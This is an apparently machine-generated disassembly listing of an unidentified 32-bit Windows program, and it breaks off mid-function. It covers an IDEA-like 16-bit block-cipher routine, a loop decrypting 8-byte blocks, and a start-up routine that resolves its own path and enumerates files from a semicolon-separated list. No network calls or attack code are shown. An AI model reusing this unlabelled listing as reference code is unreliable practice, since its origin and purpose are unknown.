mov ax, [ebp+var_28]
mov [ebp+var_14], ax
mov ax, [ebp+var_28]
xor ax, [ebp+var_1C]
mov [ebp+var_28], ax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_5029C5
movzx eax, [ebp+var_28]
and eax, 0FFFFh
mov [ebp+var_28], ax
movzx eax, [ebp+var_28]
test eax, eax
jz short loc_5029A6
movzx eax, [ebp+var_28]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_28], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_28]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_28]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_28], ax
mov ax, [ebp+var_28]
mov [ebp+var_3A], ax
jmp short loc_5029BB
; ---------------------------------------------------------------------------
loc_5029A6: ; CODE XREF: sub_5026D7+280�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_28], cx
mov ax, [ebp+var_28]
mov [ebp+var_3A], ax
loc_5029BB: ; CODE XREF: sub_5026D7+2CD�j
mov ax, [ebp+var_3A]
mov [ebp+var_3C], ax
jmp short loc_5029DA
; ---------------------------------------------------------------------------
loc_5029C5: ; CODE XREF: sub_5026D7+267�j
movzx eax, [ebp+var_28]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_28], cx
mov ax, [ebp+var_28]
mov [ebp+var_3C], ax
loc_5029DA: ; CODE XREF: sub_5026D7+2EC�j
mov ax, [ebp+var_20]
mov [ebp+var_C], ax
mov ax, [ebp+var_20]
xor ax, [ebp+var_2C]
mov [ebp+var_20], ax
mov ax, [ebp+var_20]
add ax, [ebp+var_28]
mov [ebp+var_20], ax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_502A99
movzx eax, [ebp+var_20]
and eax, 0FFFFh
mov [ebp+var_20], ax
movzx eax, [ebp+var_20]
test eax, eax
jz short loc_502A7A
movzx eax, [ebp+var_20]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_20], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_20]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_20]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_20], ax
mov ax, [ebp+var_20]
mov [ebp+var_3E], ax
jmp short loc_502A8F
; ---------------------------------------------------------------------------
loc_502A7A: ; CODE XREF: sub_5026D7+354�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_20], cx
mov ax, [ebp+var_20]
mov [ebp+var_3E], ax
loc_502A8F: ; CODE XREF: sub_5026D7+3A1�j
mov ax, [ebp+var_3E]
mov [ebp+var_40], ax
jmp short loc_502AAE
; ---------------------------------------------------------------------------
loc_502A99: ; CODE XREF: sub_5026D7+33B�j
movzx eax, [ebp+var_20]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_20], cx
mov ax, [ebp+var_20]
mov [ebp+var_40], ax
loc_502AAE: ; CODE XREF: sub_5026D7+3C0�j
mov ax, [ebp+var_28]
add ax, [ebp+var_20]
mov [ebp+var_28], ax
mov ax, [ebp+var_1C]
xor ax, [ebp+var_20]
mov [ebp+var_1C], ax
mov ax, [ebp+var_2C]
xor ax, [ebp+var_28]
mov [ebp+var_2C], ax
mov ax, [ebp+var_20]
xor ax, [ebp+var_14]
mov [ebp+var_20], ax
mov ax, [ebp+var_28]
xor ax, [ebp+var_C]
mov [ebp+var_28], ax
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz loc_50277E
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_502B9A
movzx eax, [ebp+var_1C]
and eax, 0FFFFh
mov [ebp+var_1C], ax
movzx eax, [ebp+var_1C]
test eax, eax
jz short loc_502B7B
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_1C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_1C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_1C], ax
mov ax, [ebp+var_1C]
mov [ebp+var_42], ax
jmp short loc_502B90
; ---------------------------------------------------------------------------
loc_502B7B: ; CODE XREF: sub_5026D7+455�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_42], ax
loc_502B90: ; CODE XREF: sub_5026D7+4A2�j
mov ax, [ebp+var_42]
mov [ebp+var_44], ax
jmp short loc_502BAF
; ---------------------------------------------------------------------------
loc_502B9A: ; CODE XREF: sub_5026D7+43C�j
movzx eax, [ebp+var_1C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_44], ax
loc_502BAF: ; CODE XREF: sub_5026D7+4C1�j
mov eax, [ebp+arg_8]
mov cx, [ebp+var_28]
add cx, [eax]
mov [ebp+var_28], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov cx, [ebp+var_20]
add cx, [eax]
mov [ebp+var_20], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
test eax, eax
jz loc_502C72
movzx eax, [ebp+var_2C]
and eax, 0FFFFh
mov [ebp+var_2C], ax
movzx eax, [ebp+var_2C]
test eax, eax
jz short loc_502C53
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_2C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_2C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_2C], ax
mov ax, [ebp+var_2C]
mov [ebp+var_46], ax
jmp short loc_502C68
; ---------------------------------------------------------------------------
loc_502C53: ; CODE XREF: sub_5026D7+52D�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_46], ax
loc_502C68: ; CODE XREF: sub_5026D7+57A�j
mov ax, [ebp+var_46]
mov [ebp+var_48], ax
jmp short loc_502C87
; ---------------------------------------------------------------------------
loc_502C72: ; CODE XREF: sub_5026D7+514�j
movzx eax, [ebp+var_2C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_48], ax
loc_502C87: ; CODE XREF: sub_5026D7+599�j
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
movzx eax, [ebp+var_1C]
sar eax, 8
movzx ecx, [ebp+var_1C]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
mov eax, [ebp+var_8]
inc eax
inc eax
mov [ebp+var_8], eax
movzx eax, [ebp+var_28]
sar eax, 8
movzx ecx, [ebp+var_28]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
mov eax, [ebp+var_8]
inc eax
inc eax
mov [ebp+var_8], eax
movzx eax, [ebp+var_20]
sar eax, 8
movzx ecx, [ebp+var_20]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
mov eax, [ebp+var_8]
inc eax
inc eax
mov [ebp+var_8], eax
movzx eax, [ebp+var_2C]
sar eax, 8
movzx ecx, [ebp+var_2C]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+var_8]
mov [ecx], ax
pop ebx
leave
retn 0Ch
sub_5026D7 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp-0Ch], ecx
mov eax, [ebp+8]
mov [ebp-4], eax
and dword ptr [ebp-8], 0
jmp short loc_502D1E
; ---------------------------------------------------------------------------
loc_502D17: ; CODE XREF: _5:00502D44�j
mov eax, [ebp-8]
inc eax
mov [ebp-8], eax
loc_502D1E: ; CODE XREF: _5:00502D15�j
mov eax, [ebp-8]
cmp eax, [ebp+0Ch]
jge short locret_502D46
mov eax, [ebp-0Ch]
add eax, 68h
push eax
push dword ptr [ebp-4]
push dword ptr [ebp-4]
mov ecx, [ebp-0Ch]
call sub_5026D7
mov eax, [ebp-4]
add eax, 8
mov [ebp-4], eax
jmp short loc_502D17
; ---------------------------------------------------------------------------
locret_502D46: ; CODE XREF: _5:00502D24�j
leave
retn 8
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_502D50 proc near ; CODE XREF: sub_50931F+1A�p
; sub_509A34+11�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov eax, ds:dword_5118F0
mov [ebp+var_4], eax
mov ecx, ds:dword_5118F4
imul ecx, 18h
mov edx, ds:dword_5118F0
add edx, ecx
mov [ebp+var_8], edx
jmp short loc_502D7F
; ---------------------------------------------------------------------------
loc_502D76: ; CODE XREF: sub_502D50:loc_502DB7�j
mov eax, [ebp+var_4]
add eax, 18h
mov [ebp+var_4], eax
loc_502D7F: ; CODE XREF: sub_502D50+24�j
mov ecx, [ebp+var_4]
cmp ecx, [ebp+var_8]
jz short loc_502DB9
mov ecx, 10h
mov edi, [ebp+arg_0]
mov esi, [ebp+var_4]
xor edx, edx
mov [ebp+var_C], edx
repe cmpsb
jz short loc_502DA3
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_C], eax
loc_502DA3: ; CODE XREF: sub_502D50+49�j
mov ecx, [ebp+var_C]
mov [ebp+var_10], ecx
cmp [ebp+var_10], 0
jnz short loc_502DB7
mov edx, [ebp+var_4]
mov eax, [edx+10h]
jmp short loc_502DBB
; ---------------------------------------------------------------------------
loc_502DB7: ; CODE XREF: sub_502D50+5D�j
jmp short loc_502D76
; ---------------------------------------------------------------------------
loc_502DB9: ; CODE XREF: sub_502D50+35�j
xor eax, eax
loc_502DBB: ; CODE XREF: sub_502D50+65�j
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_502D50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_502DD0 proc near ; CODE XREF: sub_504DC0+D�p
var_1F8 = dword ptr -1F8h
var_1F4 = dword ptr -1F4h
var_1F0 = dword ptr -1F0h
var_1EC = dword ptr -1ECh
var_1E8 = dword ptr -1E8h
var_1DC = dword ptr -1DCh
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1CC = dword ptr -1CCh
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = dword ptr -1BCh
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = dword ptr -19Ch
var_170 = byte ptr -170h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 005035F3 SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E408
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFE18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
push offset dword_5118C8
call ds:dword_51174C ; InitializeCriticalSection
mov [ebp+var_1C], 0
mov [ebp+var_20], 0
mov [ebp+var_24], 0FFFFFFFFh
mov [ebp+var_4], 0
call sub_4FDE50
and eax, 0FFh
mov ds:dword_510B68, eax
push 400h
call sub_50835A
add esp, 4
mov [ebp+var_1AC], eax
mov eax, [ebp+var_1AC]
mov [ebp+var_1C], eax
push 0C1Ch
call sub_50835A
add esp, 4
mov [ebp+var_1B0], eax
mov ecx, [ebp+var_1B0]
mov [ebp+var_20], ecx
mov ecx, 307h
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 400h
mov edx, [ebp+var_20]
add edx, 10h
push edx
push 0
call ds:dword_511718 ; GetModuleHandleA
push eax
call ds:dword_511714 ; GetModuleFileNameA
mov eax, [ebp+var_20]
add eax, 0C10h
push eax
mov ecx, [ebp+var_1C]
push ecx
push 400h
mov edx, [ebp+var_20]
add edx, 10h
push edx
call ds:dword_511708 ; GetFullPathNameA
push offset aGetlongpathnam ; "GetLongPathNameA"
push offset aKernel32_0 ; "kernel32"
call ds:dword_511718 ; GetModuleHandleA
push eax
call ds:dword_511728 ; GetProcAddress
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_502EE2
push 400h
mov eax, [ebp+var_20]
add eax, 10h
push eax
mov ecx, [ebp+var_1C]
push ecx
call [ebp+var_2C]
jmp short loc_502F08
; ---------------------------------------------------------------------------
loc_502EE2: ; CODE XREF: sub_502DD0+FB�j
mov edi, [ebp+var_1C]
mov edx, [ebp+var_20]
add edx, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_502F08: ; CODE XREF: sub_502DD0+110�j
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_20]
add ecx, 10h
push ecx
call ds:dword_5117C8 ; CharUpperBuffA
push 5Ch
mov edx, [ebp+var_20]
add edx, 10h
push edx
call sub_4FC700
add esp, 8
add eax, 1
mov ecx, [ebp+var_20]
mov [ecx+0C10h], eax
mov edx, [ebp+var_20]
add edx, 10h
mov eax, [ebp+var_20]
mov ecx, [eax+0C10h]
sub ecx, edx
mov edx, [ebp+var_20]
mov [edx+0C14h], ecx
push 400h
mov eax, [ebp+var_20]
add eax, 410h
push eax
mov ecx, [ebp+var_1C]
push ecx
call ds:dword_50E020 ; GetShortPathNameA
mov edi, [ebp+var_20]
add edi, 410h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov edx, [ebp+var_20]
add edx, 410h
push edx
call ds:dword_5117C8 ; CharUpperBuffA
push 5Ch
mov eax, [ebp+var_20]
add eax, 410h
push eax
call sub_4FC700
add esp, 8
add eax, 1
mov ecx, [ebp+var_20]
add ecx, 410h
sub eax, ecx
mov edx, [ebp+var_20]
mov [edx+0C18h], eax
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov [ebp+var_30], ecx
mov eax, [ebp+var_30]
add eax, 1
push eax
call sub_50835A
add esp, 4
mov [ebp+var_1B4], eax
mov ecx, [ebp+var_1B4]
mov ds:dword_51190C, ecx
mov edx, [ebp+var_20]
add edx, 10h
mov edi, edx
mov edx, ds:dword_51190C
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, ds:dword_511684
mov edx, [ecx+24h]
and edx, 2
neg edx
sbb edx, edx
neg edx
mov byte ptr [ebp+var_28], dl
mov eax, [ebp+var_28]
and eax, 0FFh
test eax, eax
jz loc_503101
mov ecx, ds:dword_511684
mov edx, [ecx+2Ch]
add edx, 30h
mov [ebp+var_3C], edx
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov [ebp+var_38], ecx
push 5Ch
mov eax, [ebp+var_20]
add eax, 10h
push eax
call sub_4FC700
add esp, 8
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jnz short loc_5030A4
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov edx, [ebp+var_20]
lea eax, [edx+ecx+10h]
mov [ebp+var_34], eax
loc_5030A4: ; CODE XREF: sub_502DD0+2B6�j
mov ecx, [ebp+var_20]
add ecx, 10h
mov edx, [ebp+var_34]
sub edx, ecx
add edx, [ebp+var_38]
cmp edx, 104h
jb short loc_5030C4
mov ecx, 0EF000004h
call sub_508342
loc_5030C4: ; CODE XREF: sub_502DD0+2E8�j
mov ecx, [ebp+var_38]
add ecx, 1
mov esi, [ebp+var_3C]
mov edi, [ebp+var_34]
add edi, 1
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, [ebp+var_20]
add edi, 10h
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_20]
add ecx, 10h
push ecx
call ds:dword_5117C8 ; CharUpperBuffA
loc_503101: ; CODE XREF: sub_502DD0+277�j
mov edx, [ebp+var_20]
mov dword ptr [edx], 0
mov eax, [ebp+var_20]
mov dword ptr [eax+4], 0
mov ecx, [ebp+var_20]
mov ds:dword_511908, ecx
mov edx, ds:dword_511684
mov eax, [edx+24h]
and eax, 1
test eax, eax
jz short loc_503140
push 1
push 1
mov ecx, [ebp+var_20]
add ecx, 10h
push ecx
call sub_503610
add esp, 0Ch
loc_503140: ; CODE XREF: sub_502DD0+35B�j
push 105h
call sub_50835A
add esp, 4
mov [ebp+var_1B8], eax
mov edx, [ebp+var_1B8]
mov [ebp+var_44], edx
push 5Ch
mov eax, [ebp+var_20]
add eax, 10h
push eax
call sub_4FC700
add esp, 8
add eax, 1
mov [ebp+var_50], eax
mov [ebp+var_48], 0
mov ecx, ds:dword_511684
mov edx, [ecx+2Ch]
add edx, 71h
mov [ebp+var_4C], edx
mov edi, [ebp+var_4C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov eax, [ebp+var_4C]
add eax, ecx
mov [ebp+var_40], eax
mov ecx, [ebp+var_4C]
cmp ecx, [ebp+var_40]
jz loc_5033DB
mov [ebp+var_48], 1
mov edx, [ebp+var_4C]
mov [ebp+var_1A0], edx
jmp short loc_5031CD
; ---------------------------------------------------------------------------
loc_5031BE: ; CODE XREF: sub_502DD0:loc_5031F8�j
mov eax, [ebp+var_1A0]
add eax, 1
mov [ebp+var_1A0], eax
loc_5031CD: ; CODE XREF: sub_502DD0+3EC�j
mov ecx, [ebp+var_1A0]
cmp ecx, [ebp+var_40]
jz short loc_5031FA
mov edx, [ebp+var_1A0]
movsx eax, byte ptr [edx]
cmp eax, 3Bh
jnz short loc_5031F8
mov ecx, [ebp+var_1A0]
mov byte ptr [ecx], 0
mov edx, [ebp+var_48]
add edx, 1
mov [ebp+var_48], edx
loc_5031F8: ; CODE XREF: sub_502DD0+414�j
jmp short loc_5031BE
; ---------------------------------------------------------------------------
loc_5031FA: ; CODE XREF: sub_502DD0+406�j
mov eax, [ebp+var_20]
add eax, 810h
mov edi, eax
mov edx, [ebp+var_44]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [ebp+var_54]
push ecx
mov edx, [ebp+var_44]
push edx
push 104h
mov eax, [ebp+var_1C]
push eax
call ds:dword_511708 ; GetFullPathNameA
mov edi, [ebp+var_44]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_44]
push ecx
call ds:dword_5117C8 ; CharUpperBuffA
mov edx, [ebp+var_4C]
mov [ebp+var_58], edx
mov [ebp+var_5C], 0
jmp short loc_50326D
; ---------------------------------------------------------------------------
loc_503264: ; CODE XREF: sub_502DD0+606�j
mov eax, [ebp+var_5C]
add eax, 1
mov [ebp+var_5C], eax
loc_50326D: ; CODE XREF: sub_502DD0+492�j
mov ecx, [ebp+var_5C]
cmp ecx, [ebp+var_48]
jnb loc_5033DB
mov edi, [ebp+var_58]
mov edx, [ebp+var_54]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [ebp+var_19C]
push ecx
mov edx, [ebp+var_44]
push edx
call ds:dword_5116D0 ; FindFirstFileA
mov [ebp+var_1A4], eax
cmp [ebp+var_1A4], 0FFFFFFFFh
jz loc_5033B8
loc_5032C0: ; CODE XREF: sub_502DD0+5D5�j
mov eax, [ebp+var_19C]
and eax, 10h
test eax, eax
jnz loc_50338F
mov ecx, [ebp+var_50]
push ecx
lea edx, [ebp+var_170]
push edx
call ds:dword_5117C0 ; lstrcmpi
test eax, eax
jz loc_50338F
lea edi, [ebp+var_170]
mov edx, [ebp+var_54]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, [ebp+var_54]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
push ecx
mov ecx, [ebp+var_54]
push ecx
call ds:dword_5117C8 ; CharUpperBuffA
mov [ebp+var_1A8], 0
mov [ebp+var_4], 1
push 0
push 1
mov edx, [ebp+var_44]
push edx
call sub_503610
add esp, 0Ch
mov [ebp+var_4], 0
jmp short loc_50338F
; ---------------------------------------------------------------------------
loc_503354: ; DATA XREF: _6:0050E418�o
mov eax, [ebp+var_14]
mov ecx, [eax]
mov edx, [ecx]
mov [ebp+var_1E8], edx
mov eax, [ebp+var_1E8]
mov [ebp+var_1A8], eax
mov ecx, [ebp+var_1A8]
and ecx, 0EF000000h
xor eax, eax
cmp ecx, 0EF000000h
setz al
retn
; ---------------------------------------------------------------------------
loc_503385: ; DATA XREF: _6:0050E41C�o
mov esp, [ebp+var_18]
mov [ebp+var_4], 0
loc_50338F: ; CODE XREF: sub_502DD0+4FB�j
; sub_502DD0+514�j ...
lea edx, [ebp+var_19C]
push edx
mov eax, [ebp+var_1A4]
push eax
call ds:dword_5116D4 ; FindNextFileA
test eax, eax
jnz loc_5032C0
mov ecx, [ebp+var_1A4]
push ecx
call ds:dword_5116CC ; FindClose
loc_5033B8: ; CODE XREF: sub_502DD0+4EA�j
; sub_502DD0+5FB�j
mov edx, [ebp+var_58]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_5033CD
mov ecx, [ebp+var_58]
add ecx, 1
mov [ebp+var_58], ecx
jmp short loc_5033B8
; ---------------------------------------------------------------------------
loc_5033CD: ; CODE XREF: sub_502DD0+5F0�j
mov edx, [ebp+var_58]
add edx, 1
mov [ebp+var_58], edx
jmp loc_503264
; ---------------------------------------------------------------------------
loc_5033DB: ; CODE XREF: sub_502DD0+3D6�j
; sub_502DD0+4A3�j
mov eax, [ebp+var_44]
mov [ebp+var_1BC], eax
mov ecx, [ebp+var_1BC]
push ecx
call sub_5083DD
add esp, 4
call sub_504490
push 10040h
call sub_50835A
add esp, 4
mov [ebp+var_1C0], eax
mov edx, [ebp+var_1C0]
mov ds:dword_5118F8, edx
push 10000h
call sub_50835A
add esp, 4
mov [ebp+var_1C4], eax
mov eax, [ebp+var_1C4]
mov ds:dword_5118FC, eax
push 10000h
call sub_50835A
add esp, 4
mov [ebp+var_1C8], eax
mov ecx, [ebp+var_1C8]
mov ds:dword_511900, ecx
push 10000h
call sub_50835A
add esp, 4
mov [ebp+var_1CC], eax
mov edx, [ebp+var_1CC]
mov ds:dword_511904, edx
push 28h
call sub_50835A
add esp, 4
mov [ebp+var_1D0], eax
cmp [ebp+var_1D0], 0
jz short loc_5034A4
push 83h
mov ecx, [ebp+var_1D0]
call sub_50B77C
mov [ebp+var_1EC], eax
jmp short loc_5034AE
; ---------------------------------------------------------------------------
loc_5034A4: ; CODE XREF: sub_502DD0+6BA�j
mov [ebp+var_1EC], 0
loc_5034AE: ; CODE XREF: sub_502DD0+6D2�j
mov eax, [ebp+var_1EC]
mov ds:dword_5118E4, eax
push 28h
call sub_50835A
add esp, 4
mov [ebp+var_1D4], eax
cmp [ebp+var_1D4], 0
jz short loc_5034EA
push 83h
mov ecx, [ebp+var_1D4]
call sub_50B77C
mov [ebp+var_1F0], eax
jmp short loc_5034F4
; ---------------------------------------------------------------------------
loc_5034EA: ; CODE XREF: sub_502DD0+700�j
mov [ebp+var_1F0], 0
loc_5034F4: ; CODE XREF: sub_502DD0+718�j
mov ecx, [ebp+var_1F0]
mov ds:dword_5118E8, ecx
push 28h
call sub_50835A
add esp, 4
mov [ebp+var_1D8], eax
cmp [ebp+var_1D8], 0
jz short loc_503531
push 83h
mov ecx, [ebp+var_1D8]
call sub_50B77C
mov [ebp+var_1F4], eax
jmp short loc_50353B
; ---------------------------------------------------------------------------
loc_503531: ; CODE XREF: sub_502DD0+747�j
mov [ebp+var_1F4], 0
loc_50353B: ; CODE XREF: sub_502DD0+75F�j
mov edx, [ebp+var_1F4]
mov ds:dword_5118E0, edx
push 28h
call sub_50835A
add esp, 4
mov [ebp+var_1DC], eax
cmp [ebp+var_1DC], 0
jz short loc_503578
push 83h
mov ecx, [ebp+var_1DC]
call sub_50B77C
mov [ebp+var_1F8], eax
jmp short loc_503582
; ---------------------------------------------------------------------------
loc_503578: ; CODE XREF: sub_502DD0+78E�j
mov [ebp+var_1F8], 0
loc_503582: ; CODE XREF: sub_502DD0+7A6�j
mov eax, [ebp+var_1F8]
mov ds:dword_5118EC, eax
mov [ebp+var_20], 0
mov [ebp+var_4], 0FFFFFFFFh
call sub_5035A2
jmp short loc_5035F3
sub_502DD0 endp
; =============== S U B R O U T I N E =======================================
sub_5035A2 proc near ; CODE XREF: sub_502DD0+7CB�p
; DATA XREF: _6:0050E410�o
mov ecx, [ebp-1Ch]
mov [ebp-1E0h], ecx
mov edx, [ebp-1E0h]
push edx
call sub_5083DD
add esp, 4
cmp dword ptr [ebp-20h], 0
jz short loc_5035E2
mov ds:dword_511908, 0
mov eax, [ebp-20h]
mov [ebp-1E4h], eax
mov ecx, [ebp-1E4h]
push ecx
call sub_5083DD
add esp, 4
loc_5035E2: ; CODE XREF: sub_5035A2+1C�j
cmp dword ptr [ebp-24h], 0FFFFFFFFh
jz short locret_5035F2
mov edx, [ebp-24h]
push edx
call ds:dword_5116A4 ; CloseHandle
locret_5035F2: ; CODE XREF: sub_5035A2+44�j
retn
sub_5035A2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_502DD0
loc_5035F3: ; CODE XREF: sub_502DD0+7D0�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_502DD0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_503610 proc near ; CODE XREF: sub_502DD0+368�p
; sub_502DD0+573�p
var_308 = dword ptr -308h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = dword ptr -144h
